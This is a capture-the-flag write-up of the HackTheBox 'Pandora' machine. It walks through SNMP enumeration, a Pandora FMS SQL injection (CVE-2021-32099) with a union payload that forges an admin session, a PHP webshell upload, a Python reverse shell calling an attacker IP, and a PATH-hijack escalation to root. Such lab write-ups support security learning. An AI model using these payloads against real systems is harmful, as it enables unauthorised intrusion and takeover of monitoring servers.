# HackTheBox-Pandora ## NMAP ```bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Play | Landing Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## PORT 80 (HTTP) Visting the web page it seems like a template

And doesn't display anything interesting , running `gobuster` to fuzz for files and directories

It doesn't find anything as well , so I thought of doing a subdomain enumeration using `wfuzz` but that failed as well

So the web application didn't had anything interesting so I starting to scan for udp port and found `snmp` service to be running

## Foothold To enumerate snmp service there's a tool called `snmp-walk` so we can enumerate the running process ,interface and operating system through that

Keeping this tool running ,after 30 minutes I saw a process with credentials being passed on

Checking the apache2 vhosts file we can see that there's a subdomain `pandora.panda.htb` and it's being ran as user `matt` but only on localhost so we need to do portforwarding in order to access it through our browser

```bash ssh -L 2222:127.0.0.1:80 daniel@panda.htb ```

Also to add domain names to /etc/hosts file

Navigating to that port through browser will present us a login page for `Pandora`

Going back to pandora's directory we can read some files out which there's a file named `pandoradb_data.sql` which has some queries , we see a query for `admin` user having his password hash

So trying to login with daniel on pnadora we get an error that we are only allowed to use api

Looking at the documention of api , we can use operations to get some data from pandora https://pandorafms.com/manual/en/documentation/08_technical_reference/02_annex_externalapi ```bash http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=list_all_user&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23 ```

We can see that daniel is only allowed to read data from opearations , we can also get password hashes of users but those were not crackable ```bash http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=users&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23 ```

Looking for exploits I found remote code execution but that requires us to be authenticated and be an admin user

The second exploit was related to sqli in`/include/chart_generator.php?session_id='`

We can verify that there's a sqli by breaking the query with `'`

Now to check how many columns are there we can use `ORDER BY`

It doesn't give any mysql errors so we are good ,let's increase a number

And it gives an error when try to sort table by the fourth column which doesn't exists and it gives an sql error so there are 3 columns in the table from which it's fetching the data ## Rabbit Hole so let's using `sqlmap` to dump data , we can either just directly supply the url or save the request through burp , I find saving the request convenient for me so I'll go with that

And it's going to start dumping the database

Now here what we have fallen into a rabbit hole , by dumping the database we can find session id for users on pandora fms but those are only for matt and daniel , daniel only has access to api and matt is just a normal user

In `PHPSESSSION` replace the session

But we can't really do much being matt user

## Privilege Escalation (Matt) So going back to the url which was vulnerable to sqli we can elevate our privilegs to become admin user by following this article https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

Checking the columns of the table that what values it expects , we can look in the `pandoradb.sql` file that `tsession_php` has three columns

Our sqli payload would look like this ```sql union+select+'randomshit_token','1638796349','id_usuario|s:5:"admin";'+--+ ``` it's using select statement to allow a phpsesssion to be created against the admin user with the token we provided ,it could be anything

Running this it doesn't show any errors which means it got executed correctly and now replacing the PHPSESSION with our token

We are now logged in as admin user now all that is left is to use the rce exploit, I tried the exploit from exploit-db but it didn't worked Then saw a php file upload exploit from a youtube video

So we can make a php file which will allow us to execute comamnds and make a zip archive of that php as we need to upload that as an extension ```php ```

Then upload the archive file having the php file

After uploading the file , execute the file through `http://127.0.0.1:2222/pandora_console/extensions/shell.php`

We can get a reverse shell through `python3` ```python python3%20-c%20%27import%20socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.17%22,3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(%22/bin/sh%22)%27 ```

Stabilizing the shell with python3

## Privilege Escalation (root) Let's try to see if we have any privileges to run something as a root user `sudo -l` but it gives an error.

So this can be fixed by generating pair of ssh keys and logging.

But it seems we can't run anything as a root user ,so moving on for fidining SUID binaries

This binary seems suspicious as this isn't available by default, transferring the `pandora_backup` binary we can see that it's using `tar` to create an archive from `/var/www/pandora/pandora_console/*` in `/root/.backup` and the archive name `pandora-backup.tar.gz`

So this is vulnerable to PATH variable exploit , we can create a file named `tar` which will make `bash` a SUID binary and making it executable

Then exporting the PATH variable ```bash export PATH=/tmp:$PATH ``` As we run the binary it will make bash a SUID

## References - https://book.hacktricks.xyz/pentesting/pentesting-snmp - https://vuldb.com/?id.174621 - https://pandorafms.com/manual/en/documentation/08_technical_reference/02_annex_externalapi - https://www.exploit-db.com/exploits/48280 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32099 - https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained - https://www.youtube.com/watch?v=rJXusinFPw4 - https://k4m1ll0.com/cve-2020-8500.html